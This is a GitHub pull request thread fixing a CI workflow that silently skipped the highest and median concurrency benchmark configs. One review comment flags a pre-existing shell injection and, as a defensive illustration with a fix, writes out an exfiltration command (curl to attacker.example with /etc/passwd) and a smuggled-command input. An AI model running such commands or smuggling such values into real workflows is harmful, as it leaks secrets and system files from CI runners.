Fix e2e-tests dropping highest concurrency benchmark configs#1020
Fix e2e-tests dropping highest concurrency benchmark configs#1020Ankur-singh merged 3 commits intomainfrom
Conversation
Remove run-eval filter from SINGLE job config generation so all single-node configs are benchmarked regardless of eval marking.
|
@Ankur-singh Thanks for the catch, having look rn. Will patch ASAP if indeed broken |
There was a problem hiding this comment.
LGTM — the one-line fix correctly removes the erroneous exclusion from SINGLE, since that job already hardcodes downstream.
Extended reasoning...
Overview
This PR modifies a single line in , removing the predicate from the SINGLE config filter. No other files are touched.
Security risks
The pre-existing unquoted expression interpolation on lines 55-56 (flagged as an inline comment) is a legitimate injection risk but predates this PR entirely. The one-line change introduced here does not add or worsen any security surface.
Level of scrutiny
This is a low-risk, mechanical fix to a CI workflow filter. The logic is self-evident: SINGLE already passes to the benchmark template unconditionally, so filtering out eval-marked entries beforehand was a bug causing 172 configs to be silently skipped. Removing the filter restores the intended behavior.
Other factors
The description provides a clear root-cause analysis and contrasts the fix with how handles the same split correctly. No ambiguity in the intent or implementation.
| pip install pydantic | ||
| CONFIG_JSON=$(python3 ${GITHUB_WORKSPACE}/utils/matrix_logic/generate_sweep_configs.py \ | ||
| ${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }}) | ||
| SINGLE=$(echo "$CONFIG_JSON" | python3 -c "import sys,json; d=json.load(sys.stdin); print(json.dumps([x for x in d if 'prefill' not in x and not x.get('run-eval', False)]))") | ||
| SINGLE=$(echo "$CONFIG_JSON" | python3 -c "import sys,json; d=json.load(sys.stdin); print(json.dumps([x for x in d if 'prefill' not in x]))") |
There was a problem hiding this comment.
🟣 The generate-cli-command input is interpolated directly into the shell command on line 56 without quoting, allowing shell metacharacters in the input to inject arbitrary commands. This is a pre-existing issue unrelated to this PR's change; the fix is to quote the expression: "${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }}", or assign it to an environment variable first.
Extended reasoning...
What the bug is and how it manifests
In GitHub Actions, expressions like ${{ inputs.foo }} inside a run: block are string-substituted directly into the shell script text before the shell interprets it. This means if inputs.generate-cli-command contains shell metacharacters — semicolons, backticks, $(...), newlines, etc. — they become part of the raw shell script and execute as commands.
The specific code path that triggers it
Lines 55-56 of .github/workflows/e2e-tests.yml:
CONFIG_JSON=$(python3 ${GITHUB_WORKSPACE}/utils/matrix_logic/generate_sweep_configs.py \
${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }})The ${{ ... }} expression is unquoted, so its text lands verbatim in the shell script.
Why existing code does not prevent it
There is no input sanitization or validation on generate-cli-command in the workflow definition. The input is declared as a plain type: string with no restrictions. GitHub Actions does not sanitize expression output in run: contexts — it only sanitizes values when they are passed via env: variables (where the shell never sees the raw substitution).
What the impact would be
A crafted input like --flag; curl https://attacker.example/exfil?$(cat /etc/passwd) # would cause the runner to execute the exfiltration command in the CI environment, which has access to repository secrets (e.g., REPO_PAT). GitHub's own security hardening guide explicitly calls this pattern out as a critical injection risk.
How to fix it
Assign the expression to an environment variable and reference the variable in the shell command:
env:
GENERATE_CLI_CMD: ${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }}
run: |
CONFIG_JSON=$(python3 ${GITHUB_WORKSPACE}/utils/matrix_logic/generate_sweep_configs.py $GENERATE_CLI_CMD)Or, at minimum, add double quotes: "${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }}" (which protects against word-splitting and some metacharacters but is not as robust as the env-var approach).
Step-by-step proof
- A user with repo write access triggers the workflow with:
generate-cli-command = '--config foo; echo INJECTED > /tmp/pwned' - GitHub Actions substitutes the expression, producing the shell script line:
CONFIG_JSON=$(python3 .../generate_sweep_configs.py --config foo; echo INJECTED > /tmp/pwned) - The shell sees two commands separated by
;: the python3 invocation, thenecho INJECTED > /tmp/pwned. - Both execute; the injection succeeds.
Pre-existing status
This vulnerability predates this PR. The PR only modifies line 57 (removing the run-eval filter from SINGLE), while the vulnerable interpolation is on lines 55-56 and was not changed. It is flagged here because the PR touches the same run: block, making this a natural point to note the issue.
|
Thanks for catch once again. That was added because The intention is:
In default mode, the old filter In Quick test: Output: |
|
@Oseltamivir that makes sense. tysm! |
|
@Ankur-singh Lol my fix has another bug where it fails when a config has only 8k1k with a single concurrency value, because I'll just stamp |
|
@Ankur-singh I'll merge this in tmr morning after looking at it again when I'm combobulated. Please help me to look through it one more time too. Thanks so much 🙏🫡 |
|
Sorry about that 🫣 |
|
Lol it's fine, probably good now with stamp of |
|
We are in this together 😂🤞 |
Problem
The
e2e-tests.ymlworkflow silently drops benchmark runs for the highest and median concurrency configs on 8k1k sequence lengths.Root cause
mark_eval_entries()marks selected entries (highest + median conc for 8k1k) withrun-eval=True. The SINGLE job filter then excludes these entries:These excluded configs only appear in the EVALS job, which runs with
eval-only: true— meaning no throughput benchmark is ever executed for them.How run-sweep handles this differently
run-sweep.ymlusesprocess_changelog.pywhich callsgenerate_sweep_configs.py test-configwith--no-evalsfor benchmarks and--evals-onlyfor evals in separate passes. This means ALL concurrency values are always benchmarked, and evals are generated independently.In contrast,
e2e-tests.ymlgenerates everything in one pass and then splits — causing the eval-marked entries to be carved out of the benchmark list entirely.Impact
Across all NVIDIA + AMD configs, 172 benchmark configs were being silently skipped. For example, with
minimaxm2.5-fp8-b200-vllm, these 8k1k configs were never benchmarked:tp=2 conc=64(median)tp=2 conc=512(highest)tp=4 conc=64(median)tp=4 conc=512(highest)Fix
Remove the
run-evalfilter from the SINGLE config generation. Since benchmark and eval jobs are separate (SINGLE hardcodesrun-eval: false, EVALS hardcodesrun-eval: true+eval-only: true), there is no need to exclude eval-marked entries from benchmarks:Eval-marked entries now run both benchmark (via SINGLE) and eval (via EVALS), which is the correct behavior.